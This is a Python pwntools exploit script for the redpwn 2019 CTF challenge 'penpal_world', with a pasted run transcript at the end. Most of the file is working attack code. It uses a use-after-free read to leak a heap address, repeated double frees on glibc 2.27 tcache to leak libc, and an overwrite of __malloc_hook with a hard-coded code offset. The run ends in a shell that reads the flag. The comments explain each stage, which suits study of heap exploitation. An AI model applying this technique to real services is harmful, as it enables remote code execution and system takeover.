#!/usr/bin/python
from pwn import *
# pwntools terminal preference: open helper windows as a tmux split pane.
context.terminal = ['tmux', 'sp', '-h']
# context.log_level = 'DEBUG'

# Target binary plus the exact libc build it is meant to run against.
# checksec=False only silences the mitigation summary for the libc object;
# the one for the main binary is still printed (see the transcript below).
elf = ELF('./penpal_world')
libc = ELF('./libc-2.27.so', checksec = False)

# Switch between the remote CTF service and a local run.  The remote host
# here is 'chall2...'; the pasted transcript at the bottom shows 'chall...',
# so the two were apparently not captured from the same configuration.
local = False
if not local:
    io = remote("chall2.2019.redpwn.net", 4010)
else:
    # Start the binary through the matching ld.so and force the bundled
    # libc in with LD_PRELOAD, so the libc-relative constants used further
    # down line up with what the remote side has.
    ld = ELF('/lib/x86_64-linux-gnu/ld-2.27.so', checksec = False)
    io = process([ld.path, elf.path], env = {"LD_PRELOAD": libc.path})
def add_postcard(idx):
    """Select menu option 1 (the 'add' action, as this script names it) for slot *idx*.

    Waits for the last line of the menu, answers with the option number,
    then answers the envelope prompt.  All traffic goes through the
    module-level ``io`` tube; nothing is returned.
    """
    dialogue = (
        ('4) Read a postcard\n', '1'),
        ('Which envelope #?\n', str(idx)),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
def edit_postcard(idx, content):
    """Select menu option 2 (the 'edit' action) for slot *idx* and write *content*.

    The menu and envelope prompts are answered with ``sendline``; the
    payload itself goes out with a raw ``send`` so that no newline is
    appended -- every caller in this file passes a packed 8-byte value.
    """
    dialogue = (
        ('4) Read a postcard\n', '2'),
        ('Which envelope #?\n', str(idx)),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
    io.recvuntil('Write.\n')
    io.send(content)
def free_postcard(idx):
    """Select menu option 3 (the 'free' action) for envelope slot *idx*.

    Nothing is read back.  The caller is the one keeping count of how
    often a slot has been released; the main sequence below releases the
    same slot repeatedly, which the program apparently does not reject.
    """
    dialogue = (
        ('4) Read a postcard\n', '3'),
        ('Which envelope #?\n', str(idx)),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
def show_postcard(idx):
    """Select menu option 4 (the 'read' action) for envelope slot *idx*.

    Only the request is sent.  Whatever the program prints for the slot is
    left on ``io`` for the caller to consume (the main sequence reads one
    line and unpacks it as an 8-byte value).
    """
    dialogue = (
        ('4) Read a postcard\n', '4'),
        ('Which envelope #?\n', str(idx)),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
def _recv_qword():
    """Read one line from ``io`` and unpack it as a little-endian 8-byte value.

    The program echoes a slot's raw bytes; the line is NUL-padded on the
    right to 8 bytes before ``u64`` so short lines still unpack.
    """
    return u64(io.recvuntil('\n', drop = True).ljust(8, '\x00'))


# --- Stage 1: heap address disclosure -------------------------------------
# Allocate two slots, free both, then *read* slot 1 after it was freed.
# That a pointer comes back at all means the program still hands out the
# released buffer: a use-after-free read.  (Inferred from the call order;
# the binary itself is not on this page.)
add_postcard(0)
add_postcard(1)
free_postcard(0)
free_postcard(1)
show_postcard(1)
chunk = _recv_qword() - 0x10
log.success('Leaked second chunk address: %s' % hex(chunk))

# --- Stage 2: libc address disclosure ----------------------------------
# Slot 1 is edited while still freed (write-after-free), then slot 0 is
# freed seven times in a row with no allocation in between -- a repeated
# double free.  The transcript at the bottom shows the bundled glibc 2.27
# accepting this; glibc 2.29+ aborts on it via the tcache 'key' check, and
# glibc 2.34+ no longer honours __malloc_hook, so the whole sequence is
# tied to this one libc build.
edit_postcard(1, p64(chunk - 0x250 + 0x10))
add_postcard(1)
add_postcard(0)
free_postcard(1)
# NOTE(review): the progress spinner is never completed, which is why the
# transcript leaves it at '[-] Filling TCACHE bin...'.
log.progress('Filling TCACHE bin...')
for _ in range(7):
    free_postcard(0)
free_postcard(0)
show_postcard(0)
leak_arena = _recv_qword()
# 0x3ebca0 is the hard-coded distance between the leaked value (labelled
# main_arena+96 in the log line) and the libc base for libc-2.27.so.
libc.address = leak_arena - 0x3ebca0
log.success('Leaked main_arena+96 address: %s' % hex(leak_arena))
log.info('GLIBC base address: %s' % hex(libc.address))
log.info('__malloc_hook address: %s' % hex(libc.sym["__malloc_hook"]))

# --- Stage 3: hook overwrite -----------------------------------------------
# Slot 1 (still freed) is pointed at __malloc_hook; presumably the second
# allocation after that returns the hook's address as a postcard buffer,
# and the edit stores libc+0x10a38c -- a libc-relative code address this
# script hard-codes for libc-2.27 -- into the hook.  The last allocation
# then runs it.
edit_postcard(1, p64(libc.sym["__malloc_hook"]))
add_postcard(1)
add_postcard(1)
edit_postcard(1, p64(libc.address + 0x10a38c))
add_postcard(1)
io.interactive()
io.close()
'''
xxx@xxx:/xxx/penpal$ python xpl.py
[*] 'xxx/penpal_world'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to chall.2019.redpwn.net on port 4010: Done
[+] Leaked second chunk address: 0x55c275124250
[-] Filling TCACHE bin...
[+] Leaked main_arena+96 address: 0x7f12669b0ca0
[*] GLIBC base address: 0x7f12665c5000
[*] __malloc_hook address: 0x7f12669b0c30
[*] Switching to interactive mode
$ cat flag.txt
flag{0h_n0e5_sW1p3r_d1D_5w!peEEeE}
'''